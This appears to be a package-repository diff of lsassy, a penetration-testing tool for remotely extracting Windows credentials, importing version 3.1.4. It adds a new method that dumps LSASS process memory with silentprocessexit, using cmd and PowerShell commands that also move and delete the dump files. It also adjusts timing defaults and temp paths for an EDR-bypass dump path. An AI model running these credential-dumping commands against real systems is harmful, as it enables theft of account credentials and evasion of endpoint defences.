Import upstream version 3.1.4
Kali Janitor
1 year, 6 months ago
0 | 0 | # lsassy |
1 | 1 | |
2 | [![PyPI version](https://d25lcipzij17d.cloudfront.net/badge.svg?id=py&type=6&v=3.1.3&x2=0)](https://pypi.org/project/lsassy/) | |
2 | [![PyPI version](https://d25lcipzij17d.cloudfront.net/badge.svg?id=py&type=6&v=3.1.4&x2=0)](https://pypi.org/project/lsassy/) | |
3 | 3 | [![PyPI Statistics](https://img.shields.io/pypi/dm/lsassy.svg)](https://pypistats.org/packages/lsassy) |
4 | 4 | [![Tests](https://github.com/hackndo/lsassy/workflows/Tests/badge.svg)](https://github.com/hackndo/lsassy/actions?workflow=Tests) |
5 | 5 | [![Twitter](https://img.shields.io/twitter/follow/hackanddo?label=HackAndDo&style=social)](https://twitter.com/intent/follow?screen_name=hackanddo) |
482 | 482 | * [s4ntiago_p](https://twitter.com/s4ntiago_p) for [nanodump](https://github.com/helpsystems/nanodump) |
483 | 483 | * [0gtweet](https://twitter.com/0gtweet) for [Rdrleakdiag technique](https://twitter.com/0gtweet/status/1299071304805560321) |
484 | 484 | * [Luis Rocha](https://twitter.com/countuponsec) for [SQLDumper technique](https://twitter.com/countuponsec/status/910969424215232518) |
485 | * [Asaf Gilboa](https://mobile.twitter.com/asaf_gilboa) for [LsassSilentProcessExit technique](https://github.com/deepinstinct/LsassSilentProcessExit) | |
485 | 486 | |
486 | 487 | ## Official Discord Channel |
487 | 488 |
29 | 29 | help='Dump module options (Example procdump_path=/opt/procdump.exe,procdump=procdump.exe') |
30 | 30 | group_dump.add_argument('--timeout', action='store', type=int, default=5, |
31 | 31 | help='Max time to wait for lsass dump (Default 5s)') |
32 | group_dump.add_argument('--time-between-commands', action='store', type=int, default=7, | |
33 | help='Time to wait between dump methods commands (Default 7s)') | |
32 | group_dump.add_argument('--time-between-commands', action='store', type=int, default=1, | |
33 | help='Time to wait between dump methods commands (Default 1s)') | |
34 | 34 | group_dump.add_argument('--parse-only', action='store_true', help='Parse dump without dumping') |
35 | 35 | group_dump.add_argument('--keep-dump', action='store_true', help='Parse dump without dumping') |
36 | 36 |
11 | 11 | |
12 | 12 | def __init__(self, session, timeout, time_between_commands): |
13 | 13 | super().__init__(session, timeout, time_between_commands) |
14 | ||
15 | # If default, set to 7. Otherwise, keep custom time | |
16 | if self._time_between_commands == 1: | |
17 | self._time_between_commands = 7 | |
18 | ||
14 | 19 | self.comsvcs_copied = False |
15 | 20 | self.comsvcs_copy_name = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8)) + ".dll" |
16 | 21 | self.comsvcs_copy_path = "\\Windows\\Temp\\" |
20 | 20 | self.tmp_ntoskrnl = "lsassy_" + ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(32)) + ".exe" |
21 | 21 | |
22 | 22 | def prepare(self, options): |
23 | with open('/tmp/{}'.format(self.tmp_ntoskrnl), 'wb') as p: | |
23 | if os.name == 'nt': | |
24 | tmp_dir = 'C:\\Windows\\Temp\\' | |
25 | else: | |
26 | tmp_dir = '/tmp/' | |
27 | with open('{}{}'.format(tmp_dir, self.tmp_ntoskrnl), 'wb') as p: | |
24 | 28 | try: |
25 | 29 | self._session.smb_session.getFile("C$", "\\Windows\\System32\\ntoskrnl.exe", p.write) |
26 | logging.success("ntoskrnl.exe downloaded to /tmp/{}".format(self.tmp_ntoskrnl)) | |
30 | logging.success("ntoskrnl.exe downloaded to {}{}".format(tmp_dir, self.tmp_ntoskrnl)) | |
27 | 31 | except Exception as e: |
28 | 32 | logging.error("ntoskrnl.exe download error", exc_info=True) |
33 | try: | |
34 | os.remove('{}{}'.format(tmp_dir, self.tmp_ntoskrnl)) | |
35 | except Exception as e: | |
36 | return None | |
29 | 37 | return None |
30 | self.ntoskrnl.content = self.get_offsets("/tmp/{}".format(self.tmp_ntoskrnl)) | |
38 | self.ntoskrnl.content = self.get_offsets("{}{}".format(tmp_dir, self.tmp_ntoskrnl)) | |
31 | 39 | |
32 | 40 | if self.ntoskrnl.content is not None: |
33 | 41 | logging.success("ntoskrnl offsets extracted") |
34 | 42 | logging.debug(self.ntoskrnl.content.split("\n")[1]) |
35 | os.remove('/tmp/{}'.format(self.tmp_ntoskrnl)) | |
43 | os.remove('{}{}'.format(tmp_dir, self.tmp_ntoskrnl)) | |
36 | 44 | |
37 | 45 | return self.prepare_dependencies(options, [self.edrsandblast, self.RTCore64, self.ntoskrnl]) |
38 | 46 |
0 | from lsassy.dumpmethod import IDumpMethod, Dependency | |
1 | ||
2 | ||
3 | class DumpMethod(IDumpMethod): | |
4 | #need_debug_privilege = True | |
5 | ||
6 | ||
7 | def __init__(self, session, timeout, time_between_commands): | |
8 | super().__init__(session, timeout, time_between_commands) | |
9 | self.silentprocessexit = Dependency("silentprocessexit", "silentprocessexit.exe") | |
10 | ||
11 | def prepare(self, options): | |
12 | return self.prepare_dependencies(options, [self.silentprocessexit]) | |
13 | ||
14 | def clean(self): | |
15 | self.clean_dependencies([self.silentprocessexit]) | |
16 | ||
17 | def get_commands(self, dump_path=None, dump_name=None, no_powershell=False): | |
18 | cmd_command = [ | |
19 | """for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do {} %J 0""".format( | |
20 | self.silentprocessexit.get_remote_path() | |
21 | ), | |
22 | """move C:\\temp\\lsass.exe-(PID-* C:\\Temp\\lsass && move C:\\Temp\\lsass\\lsass.exe*.dmp {}{} """.format(self.dump_path, self.dump_name), | |
23 | """del /s /q "C:\\temp\\lsass" && rmdir C:\\Temp\\lsass""" | |
24 | ] | |
25 | pwsh_command = [ | |
26 | "{} (Get-Process lsass).Id 0".format( | |
27 | self.silentprocessexit.get_remote_path() | |
28 | ), | |
29 | """move C:\\temp\\lsass.exe-(PID-* C:\\Temp\\lsass && move C:\\Temp\\lsass\\lsass.exe*.dmp {}{} """.format(self.dump_path, self.dump_name), | |
30 | """del /s /q "C:\\temp\\lsass" && rmdir C:\\Temp\\lsass""" ] | |
31 | return { | |
32 | "cmd": cmd_command, | |
33 | "pwsh": pwsh_command | |
34 | } |
58 | 58 | """ |
59 | 59 | StreamHandler and formatter added to root logger |
60 | 60 | """ |
61 | if (logging.getLogger().hasHandlers()): | |
62 | logging.getLogger().handlers.clear() | |
63 | ||
61 | 64 | handler = logging.StreamHandler(sys.stdout) |
62 | 65 | handler.setFormatter(LsassyFormatter(no_color)) |
63 | 66 | logging.getLogger().addHandler(handler) |
0 | 0 | [tool.poetry] |
1 | 1 | name = "lsassy" |
2 | version = "3.1.3" | |
2 | version = "3.1.4" | |
3 | 3 | description = "Tool to remotely extract credentials" |
4 | 4 | readme = "README.md" |
5 | 5 | homepage = "https://github.com/hackndo/lsassy" |